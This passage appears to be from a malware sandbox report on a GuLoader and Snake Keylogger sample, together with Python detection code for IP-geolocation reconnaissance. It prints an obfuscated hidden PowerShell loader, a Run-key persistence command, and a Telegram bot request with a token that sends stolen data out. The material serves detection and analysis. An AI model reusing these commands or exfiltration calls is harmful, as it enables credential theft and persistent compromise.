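    body: str = ""


# Patterns for the two responses seen above: the checkip HTML and the geoip XML.
CHECKIP_RE = re.compile(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})")
GEO_PATH_RE = re.compile(r"^/xml/(\d{1,3}(?:\.\d{1,3}){3})$")
COUNTRY_RE = re.compile(r"<CountryCode>([A-Z]{2})</CountryCode>")


def detect_ip_geo_recon(events, window=timedelta(seconds=60)):
    """Flag each process that learns its public IP from checkip.dyndns.org and then
    looks that same IP up on reallyfreegeoip.org within `window` seconds."""
    by_pid = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_pid.setdefault(ev.pid, []).append(ev)

    findings = []
    for pid, evs in by_pid.items():
        learned = {}  # public IP -> time checkip returned it to this process
        hits = []
        for ev in evs:
            if ev.host == "checkip.dyndns.org":
                m = CHECKIP_RE.search(ev.body)
                if m:
                    learned[m.group(1)] = ev.ts
            elif ev.host == "reallyfreegeoip.org":
                m = GEO_PATH_RE.match(ev.path)
                # Only a lookup of an address this process was just told is suspicious.
                if not m or m.group(1) not in learned:
                    continue
                if ev.ts - learned[m.group(1)] <= window:
                    c = COUNTRY_RE.search(ev.body)
                    hits.append((ev.ts, m.group(1), c.group(1) if c else None))
        if hits:
            findings.append({
                "pid": pid,
                "public_ip": hits[0][1],
                "country": hits[0][2],
                "lookups": len(hits),
                "first_seen": hits[0][0],
            })
    return findings


# Constructed events modelled on the sessions above (UTC timestamps, PID 7972).
CHECKIP_BODY = ("<html><head><title>Current IP Check</title></head>"
                "<body>Current IP Address: 8.46.123.33</body></html>")
GEO_BODY = ("<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode>"
            "<CountryName>United States</CountryName></Response>")
T0 = datetime(2024, 7, 25, 7, 56, 44)
SAMPLE_EVENTS = [
    HttpEvent(T0, 7972, "checkip.dyndns.org", "/", CHECKIP_BODY),
    HttpEvent(T0 + timedelta(seconds=1), 7972, "reallyfreegeoip.org", "/xml/8.46.123.33", GEO_BODY),
    HttpEvent(T0 + timedelta(seconds=6), 7972, "checkip.dyndns.org", "/", CHECKIP_BODY),
    HttpEvent(T0 + timedelta(seconds=7), 7972, "reallyfreegeoip.org", "/xml/8.46.123.33", GEO_BODY),
    # Benign noise (constructed): another process queries an address it was never handed.
    HttpEvent(T0 + timedelta(seconds=3), 4242, "reallyfreegeoip.org", "/xml/203.0.113.7", ""),
]


if __name__ == "__main__":
    for f in detect_ip_geo_recon(SAMPLE_EVENTS):
        print(f)
```

Keying on the address carried from one response into the next request is what makes the rule precise: a bare hostname match on either service fires on plenty of legitimate software, while a process that is handed its own public IP and immediately geolocates it is doing environment fingerprinting.
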
                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           5 | 192.168.2.4 | 49746 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-25 07:56:55 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2024-07-25 07:56:55 UTC | 708 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:55 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22938
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ioBcbA%2B4o6h6qijkKwC7S0Bdd5McQw9koUlzYyDV%2F8yaaDM4Ki7qRKNpvIycKHPEeq8ZsbdcoHlhK1nTzNf0kNdilK3hNr3KUL%2FQW5ulEQ6o%2FyK9ocADG9ZILYNnedbRs5xkRo9q"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a98a059f5c32d-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:56:55 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:56:55 UTC | 5 | IN | Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          6 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-25 07:56:57 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-25 07:56:57 UTC | 716 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:57 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22940
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6X0iEhTJPdHOENC%2FuCqwl3EbtHhzZlXclEsNowVRSdkJ%2F%2FlNsW89rXENF3FQC9U%2BAgdfd9MmGNy3AoDo5a%2BQ%2BeVkPNnFAykBCjdClkj0zIYYgTRsw0oeoEKJnBZL%2BBqX7l%2BvTL5y"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a98acadffc32a-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:56:57 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:56:57 UTC | 5 | IN | Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          7 | 192.168.2.4 | 49750 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-25 07:56:59 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-25 07:56:59 UTC | 706 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:59 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22942
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XRYBBDf3kzk%2FOhPMwvqIAilhCbYXjm8vjR6GYDnCW4EdCpf1yl%2F4%2Fp8nFQ7AnYvXTRW7Y6JpOH0uQXkAiimLEQal7Phmlf6xbvusiuhMmKBfcGIMUJGFgWKbRNwqcGQ9bIgENlJR"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a98b568398ca5-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:56:59 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:56:59 UTC | 5 | IN | Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          8 | 192.168.2.4 | 49752 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-25 07:57:01 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-25 07:57:01 UTC | 710 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:57:01 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22944
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c3F0WZKpvtBl2Up%2FTnO%2BAEna%2BZjuSdokuX1g6Or2OuOkwmhIZt90l5Mo%2FtPYZBFuH1dS0ULj0f38%2FkxgNoiN1OJ0JYjAT4LPTNfCymbKyekLjxkzIjl3VYy8lSKQiEqB7vrZ6XPJ"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a98c29fcb0f4a-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:57:01 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:57:01 UTC | 5 | IN | Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          9 | 192.168.2.4 | 49753 | 149.154.167.220 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-07-25 07:57:07 UTC | 350 | OUT | POST /bot7233802065:AAGhMGPQ0nLoLP2hx7_EW3TbcrrzChgxpJA/sendDocument?chat_id=5811709821&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=------------------------8dcad4b8239f5aa
                                          Host: api.telegram.org
                                          Content-Length: 547
                                          Connection: Keep-Alive
                                          2024-07-25 07:57:07 UTC | 547 | OUT | Data Ascii: --------------------------8dcad4b8239f5aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:019635Date and Time: 25/07/2024 / 03:56:41Client IP: 
                                          2024-07-25 07:57:07 UTC | 388 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.18.0
                                          Date: Thu, 25 Jul 2024 07:57:07 GMT
                                          Content-Type: application/json
                                          Content-Length: 537
                                          Connection: close
                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          2024-07-25 07:57:07 UTC | 537 | IN | Data Ascii: {"ok":true,"result":{"message_id":16,"from":{"id":7233802065,"is_bot":true,"first_name":"boxlgs101_bot","username":"snakebox100_bot"},"chat":{"id":5811709821,"first_name":"\ud83d\ude4f\ud83c\udffd$\u00a3\u20ac\u00a5","username":"HUBO_0","type":"private"},


                                          Target ID:0
                                          Start time:03:55:52
                                          Start date:25/07/2024
                                          Path:C:\Users\user\Desktop\Torpernes.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Torpernes.exe"
                                          Imagebase:0x400000
                                          File size:1'283'968 bytes
                                          MD5 hash:ECC4FF0EE7D123F0E90587EA3A7B9AE3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:1
                                          Start time:03:55:54
                                          Start date:25/07/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatorisk=$Rligstes.SubString(54389,3);.$Fortifikatorisk($Rligstes)"
                                          Imagebase:0xc90000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2181416185.0000000009DFB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:03:55:54
                                          Start date:25/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:03:56:31
                                          Start date:25/07/2024
                                          Path:C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\Contentious.exe"
                                          Imagebase:0x400000
                                          File size:1'283'968 bytes
                                          MD5 hash:ECC4FF0EE7D123F0E90587EA3A7B9AE3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Antivirus matches:
                                          • Detection: 11%, ReversingLabs
                                          Reputation:low
                                          Has exited:false

                                          Target ID:7
                                          Start time:03:56:35
                                          Start date:25/07/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
                                          Imagebase:0x240000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:03:56:35
                                          Start date:25/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:03:56:35
                                          Start date:25/07/2024
                                          Path:C:\Windows\SysWOW64\reg.exe
                                          Wow64 process (32bit):true
                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"
                                          Imagebase:0xce0000
                                          File size:59'392 bytes
                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:20.1%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:22.5%
                                            Total number of Nodes:1256
                                            Total number of Limit Nodes:36
                                            execution_graph
GetFileAttributesW CreateFileW 3389->3410 3413 4055f5 3389->3413 3393 40187a 3390->3393 3391 4050c1 25 API calls 3394 40185c 3391->3394 3392->3389 3395 402fa2 37 API calls 3393->3395 3396 40188d 3395->3396 3397 4018a1 SetFileTime 3396->3397 3398 4018b3 FindCloseChangeNotification 3396->3398 3397->3398 3398->3394 3400 4018c4 3398->3400 3399->3389 3401 4018c9 3400->3401 3402 4018dc 3400->3402 3403 405e3b 18 API calls 3401->3403 3404 405e3b 18 API calls 3402->3404 3405 4018d1 lstrcatW 3403->3405 3406 4018e4 3404->3406 3405->3406 3409 4055f5 MessageBoxIndirectW 3406->3409 3408->3391 3408->3394 3409->3394 3410->3389 3411->3379 3412->3380 3414 40560a 3413->3414 3415 405656 3414->3415 3416 40561e MessageBoxIndirectW 3414->3416 3415->3389 3416->3415 3885 402253 3886 402261 3885->3886 3887 40225b 3885->3887 3889 40226f 3886->3889 3890 402b3a 18 API calls 3886->3890 3888 402b3a 18 API calls 3887->3888 3888->3886 3891 40227d 3889->3891 3893 402b3a 18 API calls 3889->3893 3890->3889 3892 402b3a 18 API calls 3891->3892 3894 402286 WritePrivateProfileStringW 3892->3894 3893->3891 3895 402454 3896 402c44 19 API calls 3895->3896 3897 40245e 3896->3897 3898 402b1d 18 API calls 3897->3898 3899 402467 3898->3899 3900 40248b RegEnumValueW 3899->3900 3901 40247f RegEnumKeyW 3899->3901 3903 402793 3899->3903 3902 4024a4 RegCloseKey 3900->3902 3900->3903 3901->3902 3902->3903 3905 401ed4 3906 402b3a 18 API calls 3905->3906 3907 401edb 3906->3907 3908 40615c 2 API calls 3907->3908 3909 401ee1 3908->3909 3911 401ef2 3909->3911 3912 405d60 wsprintfW 3909->3912 3912->3911 3417 4022d5 3418 402305 3417->3418 3419 4022da 3417->3419 3421 402b3a 18 API calls 3418->3421 3420 402c44 19 API calls 3419->3420 3423 4022e1 3420->3423 3422 40230c 3421->3422 3430 402b7a RegOpenKeyExW 3422->3430 3424 4022eb 3423->3424 3428 402324 3423->3428 3425 402b3a 18 API calls 3424->3425 3427 4022f2 RegDeleteValueW RegCloseKey 3425->3427 3427->3428 3437 402ba5 3430->3437 3439 402322 3430->3439 3431 402bcb RegEnumKeyW 
3432 402bdd RegCloseKey 3431->3432 3431->3437 3433 406183 3 API calls 3432->3433 3435 402bed 3433->3435 3434 402c02 RegCloseKey 3434->3439 3438 402c1d RegDeleteKeyW 3435->3438 3435->3439 3436 402b7a 3 API calls 3436->3437 3437->3431 3437->3432 3437->3434 3437->3436 3438->3439 3439->3428 3913 4014d7 3914 402b1d 18 API calls 3913->3914 3915 4014dd Sleep 3914->3915 3917 4029c7 3915->3917 3918 40155b 3919 40296d 3918->3919 3922 405d60 wsprintfW 3919->3922 3921 402972 3922->3921 2919 4023e0 2930 402c44 2919->2930 2921 4023ea 2934 402b3a 2921->2934 2924 4023fe RegQueryValueExW 2925 402424 RegCloseKey 2924->2925 2926 40241e 2924->2926 2927 402793 2925->2927 2926->2925 2940 405d60 wsprintfW 2926->2940 2931 402b3a 18 API calls 2930->2931 2932 402c5d 2931->2932 2933 402c6b RegOpenKeyExW 2932->2933 2933->2921 2935 402b46 2934->2935 2941 405e3b 2935->2941 2938 4023f3 2938->2924 2938->2927 2940->2925 2957 405e48 2941->2957 2942 406093 2943 402b67 2942->2943 2975 405e19 lstrcpynW 2942->2975 2943->2938 2959 4060ad 2943->2959 2945 405efb GetVersion 2945->2957 2946 406061 lstrlenW 2946->2957 2949 405e3b 10 API calls 2949->2946 2951 405f76 GetSystemDirectoryW 2951->2957 2952 405f89 GetWindowsDirectoryW 2952->2957 2953 4060ad 5 API calls 2953->2957 2954 405fbd SHGetSpecialFolderLocation 2954->2957 2958 405fd5 SHGetPathFromIDListW CoTaskMemFree 2954->2958 2955 405e3b 10 API calls 2955->2957 2956 406002 lstrcatW 2956->2957 2957->2942 2957->2945 2957->2946 2957->2949 2957->2951 2957->2952 2957->2953 2957->2954 2957->2955 2957->2956 2968 405ce6 RegOpenKeyExW 2957->2968 2973 405d60 wsprintfW 2957->2973 2974 405e19 lstrcpynW 2957->2974 2958->2957 2966 4060ba 2959->2966 2960 406130 2961 406135 CharPrevW 2960->2961 2963 406156 2960->2963 2961->2960 2962 406123 CharNextW 2962->2960 2962->2966 2963->2938 2965 40610f CharNextW 2965->2966 2966->2960 2966->2962 2966->2965 2967 40611e CharNextW 2966->2967 2976 405891 2966->2976 2967->2962 2969 405d5a 2968->2969 2970 405d1a RegQueryValueExW 
2968->2970 2969->2957 2971 405d3b RegCloseKey 2970->2971 2971->2969 2973->2957 2974->2957 2975->2943 2977 405897 2976->2977 2978 4058ad 2977->2978 2979 40589e CharNextW 2977->2979 2978->2966 2979->2977 3930 401ce5 GetDlgItem GetClientRect 3931 402b3a 18 API calls 3930->3931 3932 401d17 LoadImageW SendMessageW 3931->3932 3933 401d35 DeleteObject 3932->3933 3934 4029c7 3932->3934 3933->3934 3935 40206a 3936 402b3a 18 API calls 3935->3936 3937 402071 3936->3937 3938 402b3a 18 API calls 3937->3938 3939 40207b 3938->3939 3940 402b3a 18 API calls 3939->3940 3941 402084 3940->3941 3942 402b3a 18 API calls 3941->3942 3943 40208e 3942->3943 3944 402b3a 18 API calls 3943->3944 3945 402098 3944->3945 3946 4020ac CoCreateInstance 3945->3946 3947 402b3a 18 API calls 3945->3947 3950 4020cb 3946->3950 3947->3946 3948 401423 25 API calls 3949 402197 3948->3949 3950->3948 3950->3949 3951 40376a 3952 403775 3951->3952 3953 40377c GlobalAlloc 3952->3953 3954 403779 3952->3954 3953->3954 3955 40156b 3956 401584 3955->3956 3957 40157b ShowWindow 3955->3957 3958 401592 ShowWindow 3956->3958 3959 4029c7 3956->3959 3957->3956 3958->3959 3960 40646e 3961 4062f2 3960->3961 3962 406c5d 3961->3962 3963 406373 GlobalFree 3961->3963 3964 40637c GlobalAlloc 3961->3964 3965 4063f3 GlobalAlloc 3961->3965 3966 4063ea GlobalFree 3961->3966 3963->3964 3964->3961 3964->3962 3965->3961 3965->3962 3966->3965 3967 4024ee 3968 4024f3 3967->3968 3969 40250c 3967->3969 3970 402b1d 18 API calls 3968->3970 3971 402512 3969->3971 3972 40253e 3969->3972 3977 4024fa 3970->3977 3973 402b3a 18 API calls 3971->3973 3974 402b3a 18 API calls 3972->3974 3975 402519 WideCharToMultiByte lstrlenA 3973->3975 3976 402545 lstrlenW 3974->3976 3975->3977 3976->3977 3978 402567 WriteFile 3977->3978 3979 402793 3977->3979 3978->3979 3980 4018ef 3981 401926 3980->3981 3982 402b3a 18 API calls 3981->3982 3983 40192b 3982->3983 3984 4056a1 71 API calls 3983->3984 3985 401934 3984->3985 3986 402770 3987 402b3a 18 API calls 
3986->3987 3988 402777 FindFirstFileW 3987->3988 3989 40278a 3988->3989 3990 40279f 3988->3990 3992 4027a8 3990->3992 3994 405d60 wsprintfW 3990->3994 3995 405e19 lstrcpynW 3992->3995 3994->3992 3995->3989 3996 4014f1 SetForegroundWindow 3997 4029c7 3996->3997 3998 4018f2 3999 402b3a 18 API calls 3998->3999 4000 4018f9 3999->4000 4001 4055f5 MessageBoxIndirectW 4000->4001 4002 401902 4001->4002 4003 401df3 4004 402b3a 18 API calls 4003->4004 4005 401df9 4004->4005 4006 402b3a 18 API calls 4005->4006 4007 401e02 4006->4007 4008 402b3a 18 API calls 4007->4008 4009 401e0b 4008->4009 4010 402b3a 18 API calls 4009->4010 4011 401e14 4010->4011 4012 401423 25 API calls 4011->4012 4013 401e1b ShellExecuteW 4012->4013 4014 401e4c 4013->4014 4020 404175 lstrlenW 4021 404194 4020->4021 4022 404196 WideCharToMultiByte 4020->4022 4021->4022 4030 4026f9 4031 402700 4030->4031 4033 402972 4030->4033 4032 402b1d 18 API calls 4031->4032 4034 40270b 4032->4034 4035 402712 SetFilePointer 4034->4035 4035->4033 4036 402722 4035->4036 4038 405d60 wsprintfW 4036->4038 4038->4033 4039 40447b 4040 4044b1 4039->4040 4041 40448b 4039->4041 4042 40408e 8 API calls 4040->4042 4043 404027 19 API calls 4041->4043 4044 4044bd 4042->4044 4045 404498 SetDlgItemTextW 4043->4045 4045->4040 3470 4031ff #17 SetErrorMode OleInitialize 3471 406183 3 API calls 3470->3471 3472 403242 SHGetFileInfoW 3471->3472 3545 405e19 lstrcpynW 3472->3545 3474 40326d GetCommandLineW 3546 405e19 lstrcpynW 3474->3546 3476 40327f GetModuleHandleW 3477 403299 3476->3477 3478 405891 CharNextW 3477->3478 3479 4032a7 CharNextW 3478->3479 3485 4032b9 3479->3485 3480 4033bb 3481 4033cf GetTempPathW 3480->3481 3547 4031cb 3481->3547 3483 4033e7 3486 403441 DeleteFileW 3483->3486 3487 4033eb GetWindowsDirectoryW lstrcatW 3483->3487 3484 405891 CharNextW 3484->3485 3485->3480 3485->3484 3493 4033bd 3485->3493 3555 402d69 GetTickCount GetModuleFileNameW 3486->3555 3489 4031cb 11 API calls 3487->3489 3490 403407 3489->3490 3490->3486 
3492 40340b GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3490->3492 3491 403455 3494 403508 3491->3494 3496 4034f8 3491->3496 3500 405891 CharNextW 3491->3500 3495 4031cb 11 API calls 3492->3495 3637 405e19 lstrcpynW 3493->3637 3640 4036d2 3494->3640 3499 403439 3495->3499 3583 4037ac 3496->3583 3499->3486 3499->3494 3515 403474 3500->3515 3503 403521 3505 4055f5 MessageBoxIndirectW 3503->3505 3504 403617 3506 4036ba ExitProcess 3504->3506 3511 406183 3 API calls 3504->3511 3507 40352f ExitProcess 3505->3507 3508 4034d2 3512 40596c 18 API calls 3508->3512 3509 403537 lstrcatW lstrcmpiW 3509->3494 3513 403553 CreateDirectoryW SetCurrentDirectoryW 3509->3513 3514 40362a 3511->3514 3516 4034de 3512->3516 3517 403576 3513->3517 3518 40356b 3513->3518 3519 406183 3 API calls 3514->3519 3515->3508 3515->3509 3516->3494 3638 405e19 lstrcpynW 3516->3638 3648 405e19 lstrcpynW 3517->3648 3647 405e19 lstrcpynW 3518->3647 3522 403633 3519->3522 3524 406183 3 API calls 3522->3524 3525 40363c 3524->3525 3527 40365a 3525->3527 3532 40364a GetCurrentProcess 3525->3532 3526 4034ed 3639 405e19 lstrcpynW 3526->3639 3530 406183 3 API calls 3527->3530 3529 405e3b 18 API calls 3531 4035b5 DeleteFileW 3529->3531 3533 403691 3530->3533 3534 4035c2 CopyFileW 3531->3534 3542 403584 3531->3542 3532->3527 3536 4036a6 ExitWindowsEx 3533->3536 3537 4036b3 3533->3537 3534->3542 3535 40360b 3538 405cb3 40 API calls 3535->3538 3536->3506 3536->3537 3540 40140b 2 API calls 3537->3540 3538->3494 3539 405cb3 40 API calls 3539->3542 3540->3506 3541 405e3b 18 API calls 3541->3542 3542->3529 3542->3535 3542->3539 3542->3541 3543 405590 2 API calls 3542->3543 3544 4035f6 CloseHandle 3542->3544 3543->3542 3544->3542 3545->3474 3546->3476 3548 4060ad 5 API calls 3547->3548 3550 4031d7 3548->3550 3549 4031e1 3549->3483 3550->3549 3551 405864 3 API calls 3550->3551 3552 4031e9 CreateDirectoryW 3551->3552 3649 405ab4 3552->3649 3653 405a85 GetFileAttributesW CreateFileW 3555->3653 
